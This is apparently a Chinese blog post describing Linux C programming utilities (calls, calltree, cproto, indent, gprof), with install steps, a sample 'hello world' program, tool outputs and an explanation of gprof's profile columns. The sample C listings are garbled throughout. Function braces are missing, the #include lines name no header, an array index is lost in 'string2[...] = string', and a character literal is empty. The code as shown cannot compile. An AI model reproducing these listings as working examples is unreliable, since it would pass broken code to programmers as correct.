bigicon 使用大图标. 

calls 
你可以在 sunsite.unc.edu FTP 站点用下面的路径: 
/pub/Linux/devel/lang/c/calls.tar.Z 
来取得 calls , 一些旧版本的 Linux CD-ROM 发行版里也附带有. 因为它是一个有用的 
工具, 我们在这里也介绍一下. 如果你觉得有用的话, 从 BBS, FTP, 或另一张CD-ROM 上 
弄一个拷贝. calls 调用 GCC 的预处理器来处理给出的源程序文件, 然后输出这些文件 
的里的函数调用树图. 

注意: 在你的系统上安装 calls , 以超级用户身份登录后执行下面的步骤: 1. 解压和 
untar 文件. 2. cd 进入 calls untar 后建立的子目录. 3. 把名叫 calls 的文件移动 
到 /usr/bin 目录. 4. 把名叫 calls.1 的文件移动到目录 /usr/man/man1 . 5. 删除 
/tmp/calls 目录. 这些步骤将把 calls 程序和它的指南页安装载你的系统上. 

------------------------------------------------------------------------------ 
-- 

当 calls 打印出调用跟踪结果时, 它在函数后面用中括号给出了函数所在文件的文件名: 

main [hello.c] 
如果函数并不是向 calls 给出的文件里的, calls 不知道所调用的函数来自哪里, 则只 
显示函数的名字: 

printf 
calls 不对递归和静态函数输出. 递归函数显示成下面的样子: 

fact <<< recursive in factorial.c >>> 
静态函数象这样显示: 

total [static in calculate.c] 
作为一个例子, 假设用 calls 处理下面的程序: 

#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 
my_print (my_string); 


void count_sum() 

int i,sum=0; 
for(i=0; i<1000000; i++) 
sum += i; 


void my_print (char *string) 

count_sum(); 
printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; 
int size, i,sum =0; 

count_sum(); 
size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) string2[size -1 - i] = string
string2[size] = ''
for(i=0; i<5000000; i++) 
sum += i; 

printf ("The string printed backward is %s ", string2); 

将产生如下的输出: 

1 __underflow [hello.c] 
2 main 
3 my_print [hello.c] 
4 count_sum [hello.c] 
5 printf 
6 my_print2 [hello.c] 
7 count_sum 
8 strlen 
9 malloc 
10 printf 
calls 有很多命令行选项来设置不同的输出格式, 有关这些选项的更多信息请参考 calls 
的指南页. 方法是在命令行上键入 calls -h . 

calltree 
calltree与calls类似,初了输出函数调用树图外,还有其它详细的信息。 
可以从sunsite.unc.edu FTP 站点用下面的路径 
:/pub/Linux/devel/lang/c/calltree.tar.gz得到calltree. 

cproto 
cproto 读入 C 源程序文件并自动为每个函数产生原型申明. 用 cproto 可以在写程序时 
为你节省大量用来定义函数原型的时间. 
如果你让 cproto 处理下面的代码(cproto hello.c): 

#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 


void my_print (char *string) 

printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; 
int size, i; 

size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) 
string2[size -1 - i] = string
string2[size] = ''

printf ("The string printed backward is %s ", string2); 

你将得到下面的输出: 

/* hello.c */ 

int main(void); 

int my_print(char *string); 

int my_print2(char *string); 
这个输出可以重定向到一个定义函数原型的包含文件里. 

indent 
indent 实用程序是 Linux 里包含的另一个编程实用工具. 这个工具简单的说就为你的代 
码产生美观的缩进的格式. indent 也有很多选项来指定如何格式化你的源代码.这些选项 
的更多信息请看indent 的指南页, 在命令行上键入 indent -h . 

下面的例子是 indent 的缺省输出: 

运行 indent 以前的 C 代码: 

#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 


void my_print (char *string) 

printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; int size, i; 

size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) string2[size -1 - i] = string
string2[size] = ''

printf ("The string printed backward is %s ", string2); 

运行 indent 后的 C 代码: 

#include  
static void my_print (char *); 
static void my_print2 (char *); 
main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 

void 
my_print (char *string) 

printf ("The string is %s ", string); 

void 
my_print2 (char *string) 

char *string2; 
int size, i; 
size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) 
string2[size - 1 - i] = string
string2[size] = ''
printf ("The string printed backward is %s ", string2); 

indent 并不改变代码的实质内容, 而只是改变代码的外观. 使它变得更可读, 这永远是 
一件好事. 

gprof 
gprof 是安装在你的 Linux 系统的 /usr/bin 目录下的一个程序. 它使你能剖析你的程 
序从而知道程序的哪一个部分在执行时最费时间. 

gprof 将告诉你程序里每个函数被调用的次数和每个函数执行时所占时间的百分比. 你如 
果想提高你的程序性能的话这些信息非常有用. 

为了在你的程序上使用 gprof, 你必须在编译程序时加上 -pg 选项. 这将使程序在每次 
执行时产生一个叫 gmon.out 的文件. gprof 用这个文件产生剖析信息. 

在你运行了你的程序并产生了 gmon.out 文件后你能用下面的命令获得剖析信息: 

gprof  
参数 program_name 是产生 gmon.out 文件的程序的名字. 

为了说明问题,在程序中增加了函数count_sum()以消耗CPU时间,程序如下 
#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 
my_print (my_string); 


void count_sum() 

int i,sum=0; 
for(i=0; i<1000000; i++) 
sum += i; 


void my_print (char *string) 

count_sum(); 
printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; 
int size, i,sum =0; 

count_sum(); 
size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) string2[size -1 - i] = string
string2[size] = ''
for(i=0; i<5000000; i++) 
sum += i; 

printf ("The string printed backward is %s ", string2); 

$ gcc -pg -o hello hello.c 
$ ./hello 
$ gprof hello | more 
将产生以下的输出 
Flat profile: 

Each sample counts as 0.01 seconds. 
% cumulative self self total 
time seconds seconds calls us/call us/call name 
69.23 0.09 0.09 1 90000.00 103333.33 my_print2 
30.77 0.13 0.04 3 13333.33 13333.33 count_sum 
0.00 0.13 0.00 2 0.00 13333.33 my_print 

% 执行此函数所占用的时间占程序总 
time 执行时间的百分比 

cumulative 累计秒数 执行此函数花费的时间 
seconds (包括此函数调用其它函数花费的时间) 

self 执行此函数花费的时间 
seconds (调用其它函数花费的时间不计算在内) 

calls 调用次数 

self 每此执行此函数花费的微秒时间 
us/call 

total 每此执行此函数加上它调用其它函数 
us/call 花费的微秒时间 

name 函数名 

由以上数据可以看出,执行my_print()函数本身没花费什么时间,但是它又调用了 
count_sum()函数,所以累计秒数为0.13. 

技巧: gprof 产生的剖析数据很大, 如果你想检查这些数据的话最好把输出重定向到一个 
文件里. 

阅读(165) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~